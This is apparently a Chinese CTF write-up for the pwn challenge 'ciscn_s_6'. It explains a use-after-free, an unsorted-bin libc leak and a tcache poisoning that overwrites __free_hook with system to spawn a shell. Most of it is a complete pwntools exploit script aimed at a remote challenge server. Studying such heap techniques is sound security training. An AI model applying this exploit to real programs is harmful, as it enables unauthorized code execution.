ciscn_s_6
惯例我们先来checksec一下
保护全开的64位程序 放进ida64里看看
非常标准的菜单题
漏洞点出现在call函数(也就是我们通常题目的delete函数)中只将chunk free了而未将指针置零 存在uaf漏洞
需要注意的是由于此题是在ubuntu18.04环境下的题目因此存在tcache 这其实没什么大不了的 因为未将指针归零 因此我们只要执行7次delete函数即可
那么我们的思路就很明了了 首先我们先用unsorted bin leak来泄露libc地址
然后我们利用tcache attack将我们的chunk迁移到free_hook上 将free_hook篡改为system函数 然后free我们预先申请好的内容为“/bin/sh”的chunk 达成执行system("/bin/sh")
,自此我们成功获取了控制权
exp
from pwn import *
#io=process('./ciscn_s_6')
io=remote('node4.buuoj.cn',26447)
elf=ELF("./ciscn_s_6")
libc = ELF('./libc-2.27.so')
context.log_level='debug'
def add(size,content,call):
io.recvuntil(b"choice:")
io.sendline(b"1")
io.recvuntil(b"Please input the size of compary's name\n")
io.sendline(str(size))
io.recvuntil("please input name:\n")
io.send(content)
io.recvuntil("please input compary call:\n")
io.sendline(call)
def show(idx):
io.recvuntil(b"choice:")
io.sendline(b"2")
io.recvuntil("Please input the index:")
io.sendline(str(idx))
def delete(idx):
io.recvuntil(b"choice:")
io.sendline(b"3")
io.recvuntil("Please input the index:")
io.sendline(str(idx))
add(0x80,b"aaaa",b"bbbb") #chunk 0
add(0x80,b"cccc",b"dddd") #chunk 1
add(0x20,b"eeee",b"ffff") #chunk 2
add(0x20,b"/bin/sh",b"hhhh") #chunk 3
delete(0) #1
delete(0) #2
delete(0) #3
delete(0) #4
delete(0) #5
delete(0) #6
delete(0) #7
#at this time the tcache whose size is 0x80 has benn filled
delete(1) #this chunk will go to unsorted bin
show(1)
unsortedbin = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(unsortedbin))
libcbase=unsortedbin-0x70-libc.sym['__malloc_hook']
system = libcbase + libc.sym['system']
free_hook = libcbase + libc.sym['__free_hook']
print(hex(system))
#gdb.attach(io)
#pause()
delete(2)
delete(2)
add(0x20,p64(free_hook),"bbb")
add(0x20,'c','b')
add(0x20,p64(system),"c")
delete(3)
io.interactive()